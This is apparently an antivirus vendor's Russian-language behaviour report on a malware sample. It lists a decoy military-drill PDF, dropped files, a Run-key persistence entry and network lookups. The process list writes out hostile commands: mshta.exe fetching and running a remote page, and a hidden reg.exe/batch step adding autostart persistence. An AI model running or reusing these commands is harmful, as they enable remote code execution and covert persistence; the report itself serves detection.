Техническая информация
Для обеспечения автозапуска и распространения
Модифицирует следующие ключи реестра
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'Feedly' = '%ALLUSERSPROFILE%\Feedly\credwiz.exe'
Изменения в файловой системе
Создает следующие файлы
- %ALLUSERSPROFILE%\update.js
- %TEMP%\instructions-on-discharge-drill-jcos-or.pdf
- %ALLUSERSPROFILE%\feedly\tempifile.txt
- %ALLUSERSPROFILE%\feedly\tempihta.hta
- %ALLUSERSPROFILE%\feedly\credwiz.exe
- %ALLUSERSPROFILE%\feedly\duser.dll
- %ALLUSERSPROFILE%\feedly\addreg.bat
- %TEMP%\feedly\windl.exe
Сетевая активность
TCP
Запросы HTTP GET
- http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt
UDP
- DNS ASK di####cademy.com
- DNS ASK ip#.co.in
- DNS ASK microsoft.com
Другое
Создает и запускает на исполнение
- '%WINDIR%\syswow64\wscript.exe' "%ALLUSERSPROFILE%\update.js"
- '%WINDIR%\syswow64\cmd.exe' /c ""%ALLUSERSPROFILE%\Feedly\addreg.bat" "' (со скрытым окном)
Запускает на исполнение
- '%ProgramFiles(x86)%\adobe\acrobat reader dc\reader\acrord32.exe' "%TEMP%\INSTRUCTIONS-ON-DISCHARGE-DRILL-JCOs-OR.pdf"
- '%WINDIR%\syswow64\mshta.exe' https://dice-academy.com/new/media/docs/hww/css/index.php
- '%WINDIR%\syswow64\mshta.exe' "%ALLUSERSPROFILE%\Feedly\tempiHta.hta"
- '%WINDIR%\syswow64\cmd.exe' /c ""%ALLUSERSPROFILE%\Feedly\addreg.bat" "
- '%WINDIR%\syswow64\reg.exe' ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Feedly" /t REG_SZ /F /D "%ALLUSERSPROFILE%\Feedly\credwiz.exe"
